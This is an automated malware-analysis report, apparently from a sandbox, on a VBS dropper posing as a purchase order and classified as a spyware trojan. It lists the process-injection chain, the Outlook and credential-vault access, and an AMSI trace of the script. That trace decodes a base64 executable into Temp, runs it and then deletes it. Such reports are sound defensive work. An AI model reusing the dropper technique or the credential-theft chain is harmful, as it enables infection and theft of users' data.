                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02CEFA49
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02CE7A46
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02CA3A6C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02CE6BD7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02BF9B80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02C4FB80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02CEAB40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02CEFB76
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C338E04_2_02C338E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C5E8F04_2_02C5E8F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C168B84_2_02C168B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C328404_2_02C32840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C3A8404_2_02C3A840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C329A04_2_02C329A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CFA9A64_2_02CFA9A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C399504_2_02C39950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C4B9504_2_02C4B950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C469624_2_02C46962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CEEEDB4_2_02CEEEDB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C42E904_2_02C42E90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CECE934_2_02CECE93
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C39EB04_2_02C39EB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C30E594_2_02C30E59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CEEE264_2_02CEEE26
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C22FC84_2_02C22FC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C3CFE04_2_02C3CFE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C31F924_2_02C31F92
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02BF3FD54_2_02BF3FD5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02BF3FD24_2_02BF3FD2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CEFFB14_2_02CEFFB1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA4F404_2_02CA4F40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CEFF094_2_02CEFF09
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C50F304_2_02C50F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C20CF24_2_02C20CF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CEFCF24_2_02CEFCF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CD0CB54_2_02CD0CB5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C30C004_2_02C30C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA9C324_2_02CA9C32
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C4FDC04_2_02C4FDC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C2ADE04_2_02C2ADE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C48DBF4_2_02C48DBF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C33D404_2_02C33D40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CE1D5A4_2_02CE1D5A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CE7D734_2_02CE7D73
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C3AD004_2_02C3AD00
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0343A3526_2_0343A352
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0343132D6_2_0343132D
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0336D34C6_2_0336D34C
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_034403E66_2_034403E6
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033C739A6_2_033C739A
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0338E3F06_2_0338E3F0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_034202746_2_03420274
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033852A06_2_033852A0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_034212ED6_2_034212ED
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0339B2C06_2_0339B2C0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0344B16B6_2_0344B16B
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033701006_2_03370100
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0336F1726_2_0336F172
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033B516C6_2_033B516C
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0341A1186_2_0341A118
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0338B1B06_2_0338B1B0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_034381CC6_2_034381CC
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_034401AA6_2_034401AA
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0342F0CC6_2_0342F0CC
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0343F0E06_2_0343F0E0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_034370E96_2_034370E9
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033870C06_2_033870C0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033807706_2_03380770
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033A47506_2_033A4750
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0343F7B06_2_0343F7B0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0337C7C06_2_0337C7C0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_034316CC6_2_034316CC
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0339C6E06_2_0339C6E0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033805356_2_03380535
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_034375716_2_03437571
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_034405916_2_03440591
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0341D5B06_2_0341D5B0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_034324466_2_03432446
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033714606_2_03371460
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0343F43F6_2_0343F43F
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0342E4F66_2_0342E4F6
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0343AB406_2_0343AB40
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0343FB766_2_0343FB76
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03436BD76_2_03436BD7
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0339FB806_2_0339FB80
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03437A466_2_03437A46
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0343FA496_2_0343FA49
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033F3A6C6_2_033F3A6C
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0342DAC66_2_0342DAC6
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033C5AA06_2_033C5AA0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0337EA806_2_0337EA80
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0341DAAC6_2_0341DAAC
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033969626_2_03396962
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033899506_2_03389950
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0339B9506_2_0339B950
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033829A06_2_033829A0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0344A9A66_2_0344A9A6
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0338A8406_2_0338A840
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033828406_2_03382840
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033668B86_2_033668B8
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033AE8F06_2_033AE8F0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033838E06_2_033838E0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033A0F306_2_033A0F30
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0343FF096_2_0343FF09
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033F4F406_2_033F4F40
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03381F926_2_03381F92
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0338CFE06_2_0338CFE0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0343FFB16_2_0343FFB1
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03372FC86_2_03372FC8
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03380E596_2_03380E59
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0343EE266_2_0343EE26
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03389EB06_2_03389EB0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0343EEDB6_2_0343EEDB
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03392E906_2_03392E90
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0343CE936_2_0343CE93
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03431D5A6_2_03431D5A
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03437D736_2_03437D73
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0338AD006_2_0338AD00
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03383D406_2_03383D40
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03398DBF6_2_03398DBF
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0337ADE06_2_0337ADE0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0339FDC06_2_0339FDC0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_033F9C326_2_033F9C32
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03380C006_2_03380C00
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0343FCF26_2_0343FCF2
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03370CF26_2_03370CF2
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03420CB56_2_03420CB5
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02C122A06_2_02C122A0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02C0B38D6_2_02C0B38D
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02C0B3906_2_02C0B390
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02C0D3B06_2_02C0D3B0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02C0D1906_2_02C0D190
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02C0B4D46_2_02C0B4D4
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02C0B4E06_2_02C0B4E0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02C13AFA6_2_02C13AFA
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02C13B406_2_02C13B40
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02C13B3B6_2_02C13B3B
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02C159406_2_02C15940
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02C2BFC06_2_02C2BFC0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0323E3446_2_0323E344
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0323E7FC6_2_0323E7FC
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0323E4666_2_0323E466
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0323CB736_2_0323CB73
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0323CAEA6_2_0323CAEA
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0323D8C86_2_0323D8C8
                Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exeCode function: 9_2_0587CCC59_2_0587CCC5
                Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exeCode function: 9_2_0587CAFF9_2_0587CAFF
                Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 11_2_0000021FB4D76AEA11_2_0000021FB4D76AEA
                Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 11_2_0000021FB4D787FC11_2_0000021FB4D787FC
                Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 11_2_0000021FB4D7834411_2_0000021FB4D78344
                Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 11_2_0000021FB4D76B7311_2_0000021FB4D76B73
                Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 11_2_0000021FB4D778C811_2_0000021FB4D778C8
                Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 11_2_0000021FB4D7846611_2_0000021FB4D78466
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: String function: 033C7E54 appears 88 times
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: String function: 0336B970 appears 263 times
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: String function: 033FF290 appears 105 times
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: String function: 033B5130 appears 36 times
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: String function: 033EEA12 appears 84 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 02CAF290 appears 105 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 02C77E54 appears 88 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 02C65130 appears 36 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 02C9EA12 appears 84 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 02C1B970 appears 263 times
                Source: PO_1111101161.vbs | Initial sample: Strings found which are bigger than 50
                Source: p_Cm7afCdw.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: p_Cm7afCdw.exe.0.dr, ce3944aa07b1cff9ab1bef1e9885a9a97.cs | Cryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
                Source: p_Cm7afCdw.exe.0.dr, c69be8bb92ecb07bb655463f3d3cc8c62.cs | Cryptographic APIs: 'CreateDecryptor'
                Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winVBS@9/4@5/5
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\p_Cm7afCdw.exe.log
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exe | Mutant created: NULL
                Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user~1\AppData\Local\Temp\exec_VPfRCcR9.log
                Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_1111101161.vbs"
                Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: PO_1111101161.vbs | ReversingLabs: Detection: 18%
                Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exe "C:\Users\user~1\AppData\Local\Temp\p_Cm7afCdw.exe"
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe | Process created: C:\Windows\SysWOW64\SearchProtocolHost.exe "C:\Windows\SysWOW64\SearchProtocolHost.exe"
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Windows\System32\wscript.exe | Sections loaded: version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, vbscript.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll, wshext.dll, scrobj.dll, scrrun.dll, msxml3.dll, msdart.dll, mpr.dll, windows.storage.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, apphelp.dll
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exe | Sections loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, wldp.dll, amsi.dll, userenv.dll, profapi.dll, msasn1.dll, gpapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Sections loaded: apphelp.dll, aclayers.dll, mpr.dll, sfc.dll, sfc_os.dll
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Sections loaded: tquery.dll, windows.storage.dll, cryptdll.dll, windows.storage.dll, wldp.dll, wininet.dll, kernel.appcore.dll, uxtheme.dll, ieframe.dll, iertutil.dll, netapi32.dll, version.dll, userenv.dll, winhttp.dll, wkscli.dll, netutils.dll, sspicli.dll, profapi.dll, secur32.dll, mlang.dll, propsys.dll, winsqlite3.dll, vaultcli.dll, wintypes.dll, dpapi.dll, cryptbase.dll
                Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe | Sections loaded: wininet.dll, mswsock.dll, dnsapi.dll, iphlpapi.dll, fwpuclnt.dll, rasadhlp.dll
                Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: Binary string: wntdll.pdb source: RegAsm.exe, SearchProtocolHost.exe

                Data Obfuscation

                Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("C:\Users\user~1\AppData\Local\Temp\p_Cm7afCdw.exe", "1", "true");IFileSystem3.GetSpecialFolder("2");IFolder.Path();IHost.Sleep("Unsupported parameter type 00000004");IFileSystem3.OpenTextFile("C:\Users\user~1\AppData\Local\Temp\exec_VPfRCcR9.log", "8", "true");ITextStream.WriteLine("02/12/2024 09:53:20 - INFO: Setup done.");ITextStream.Close();IDictionary.Add("%%", "A");IDictionary.Add("))", "T");IDictionary.Add("@@", "V");IDictionary.Add("...", "B");IDictionary.Add("&&&", "J");IDictionary.Add("**", "M");IDictionary.Add("::", "R");IDictionary.Add("~~", "Q");IDictionary.Keys();IDictionary.Item("%%");IDictionary.Item("))");IDictionary.Item("@@");IDictionary.Item("...");IDictionary.Item("&&&");IDictionary.Item("**");IDictionary.Item("::");IDictionary.Item("~~");IXMLDOMNode._00000029("base64");IXMLDOMElement.dataType("bin.base64");IXMLDOMElement.text("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAJJrTWcAAAAAAAAAAOAALgALATAAAAIGAAAIBgAAAAAA0iA");IXMLDOMElement.nodeTypedValue();IFileSystem3.GetSpecialFolder("2");IFolder.Path();_Stream.Type("1");_Stream.Open();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user~1\AppData\Local\Temp\p_Cm7afCdw.exe", "2");_Stream.Close();IFileSystem3.FileExists("C:\Users\user~1\AppData\Local\Temp\p_Cm7afCdw.exe");IHost.Sleep("Unsupported parameter type 00000004");IWshShell3.Run("C:\Users\user~1\AppData\Local\Temp\p_Cm7afCdw.exe", "1", "true");IFileSystem3.FileExists("C:\Users\user~1\AppData\Local\Temp\p_Cm7afCdw.exe");IFileSystem3.DeleteFile("C:\Users\user~1\AppData\Local\Temp\p_Cm7afCdw.exe");IFileSystem3.GetSpecialFolder("2");IFolder.Path();IHost.Sleep("Unsupported parameter type 00000004");IFileSystem3.OpenTextFile("C:\Users\user~1\AppData\Local\Temp\exec_VPfRCcR9.log", "8", "true");ITextStream.WriteLine("02/12/2024 09:53:20 - INFO: Setup done.");ITextStream.Close();IDictionary.Add("%%", "A");IDictionary.Add("))", "T");IDictionary.Add("@@", "V");IDictionary.Add("...", "B");IDictionary.Add("&&&", "J");IDictionary.Add("**", "M");IDictionary.Add("::", "R");IDictionary.Add("~~", "Q");IDictionary.Keys();IDictionary.Item("%%");IDictionary.Item("))");IDictionary.Item("@@");IDictionary.Item("...");IDictionary.Item("&&&");IDictionary.Item("**");IDictionary.Item("::");IDictionary.Item("~~");IXMLDOMNode._00000029("base64");IXMLDOMElement.dataType("bin.base64");IXMLDOMElement.text("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAJJrTWcAAAAAAAAAAOAALgALATAAAAIGAAAIBgAAAAAA0iA");IXMLDOMElement.nodeTypedValue();IFileSystem3.GetSpecialFolder("2");IFolder.Path();_Stream.Type("1");_Stream.Open();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user~1\AppData\Local\Temp\p_Cm7afCdw.exe
                Source: p_Cm7afCdw.exe.0.dr, ceb98a9c438487b1a75a637dc1f78bd03.cs .Net Code: cccb63f871ff4c04b83a7a96f5cd88f74 System.Reflection.Assembly.Load(byte[])
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_0040203D push ebp; ret 4_2_0040203E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_004129B0 push edi; iretd 4_2_004129BF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_004129B3 push edi; iretd 4_2_004129BF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_00402205 push edx; iretd 4_2_00402208
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_00412A0A push edi; iretd 4_2_004129BF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_0040DB1B pushfd ; ret 4_2_0040DB1C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_00419320 push ebx; retf 4_2_0041936D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_00403480 push eax; ret 4_2_00403482
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_004024B1 push ds; ret 4_2_004024B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_00404D48 push edx; ret 4_2_00404D4B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_0041ADE0 push edx; iretd 4_2_0041ADF5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_0040D757 push ecx; ret 4_2_0040D772
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_0040870B push dword ptr [edx]; ret 4_2_00408710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_00414FE5 push edx; iretd 4_2_00414FFC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_004017F6 push ds; iretd 4_2_004017FE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4_2_0040D78C push ecx; ret 4_2_0040D772
